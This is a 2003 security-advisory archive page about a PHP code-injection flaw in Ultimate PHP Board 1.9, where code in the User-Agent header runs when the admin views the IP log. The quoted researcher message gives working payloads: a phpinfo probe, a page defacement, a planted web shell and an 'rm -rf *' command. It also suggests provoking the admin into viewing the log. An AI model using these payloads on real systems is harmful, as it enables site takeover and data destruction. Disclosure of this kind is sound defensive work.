SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Ultimate PHP Board Vendors:   Hoeppner, Tim
Ultimate PHP Board Input Validation Flaw in 'iplog' File Lets Remote Users Cause Arbitrary PHP Code to Be Executed on the System
SecurityTracker Alert ID:  1006841
SecurityTracker URL:  http://securitytracker.com/id/1006841
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 24 2003
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.9
Description:   A vulnerability was reported in Ultimate PHP Board (UPB). A remote user can cause arbitrary PHP code to be executed on the system by the UPB administrator.

F0KP reported a that a remote user can cause PHP code to be logged by the system and then can cause the code to be executed by the UPB administrator. According to the report, the application will log the contents of the user-supplied HTTP_USER_AGENT field to the 'iplog' text file in the 'db' directory. If the remote user inserts PHP code into the user agent field, and then the administrator views the log file with the 'admin_iplog.php' script, the inserted PHP code will be executed on the target server.

A demonstration exploit transcript is provided:

e@some_host$ telnet hostname 80
Connected to hostname at 80
GET /board/index.php HTTP/1.0
User-Agent: <? phpinfo(); ?>

Some additional demonstration exploit commands are provided in the Source Message.

Impact:   A remote user can cause arbitrary PHP code to be written to a log file so that, when the administrator views the log file, the arbitrary code will be executed on the target system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.myupb.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  UPB: Discussion Board/Web-Site Takeover


=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: UPB: Discussion Board/Web-Site Takeover
product: Ultimate PHP Board v1.9 [ latest ]
vendor: www.myupb.com
risk: high
date: 05/24/2k3
discovered by: euronymous /F0KP 
advisory urls: http://f0kp.iplus.ru/bz/024.en.txt
               http://f0kp.iplus.ru/bz/024.ru.txt 
contact email: euronymous@iplus.ru
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=


description
-----------

there is serious vuln, that allow to attacker execute random php
code. the UPB logs some visitor info [ such as REMOTE_ADDR and 
HTTP_USER_AGENT ] in text file under `db' directory named `iplog'.
then in admin panel board admin can to call admin_iplog.php, that
just include `iplog'. Thats 0k, but..

e@some_host$ telnet hostname 80
Connected to hostname at 80
GET /board/index.php HTTP/1.0
User-Agent: <? phpinfo(); ?>

when admin call the admin_iplog.php your php code will executed.

examples for kodsweb skids:

1. <? system( "echo \'hacked\' > ../index.html" ); ?>

will deface forum main page

2. <? system( "echo \'<? system( $cmd ); ?>\' > ../../tcsh.php" ); ?>

will create tcsh.php in wwwroot with httpd privileges.
then you just go to http://hostname/tcsh.php?cmd=rm -rf *

after inject code through User-Agent field you have wait for admin see 
the admin_iplog.php. how to make admin see the iplog?? its quite easy 
== just annoy the admin, use the swearing in board messages, etc.


bonus
-----

in http://www.securityfocus.com/archive/1/302459 i just wrote 
about some vuln in prior versions of UPB. and i wanna say, that 
some described vulns else exists in 1.9!!

have a nice day >:E


shouts: DWC, DHG, NetPoison, HUNGOSH, security.nnov.ru, 
N0b0d13s Team and all russian security guyz!! 
to kate especially )) 
hates: slavomira and other dirty ppl in *.kz $#%&^!  
k0dsweb lamers team == yeah, i really __HATE__ yours!!
          

================
im not a lame,
not yet a hacker
================

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC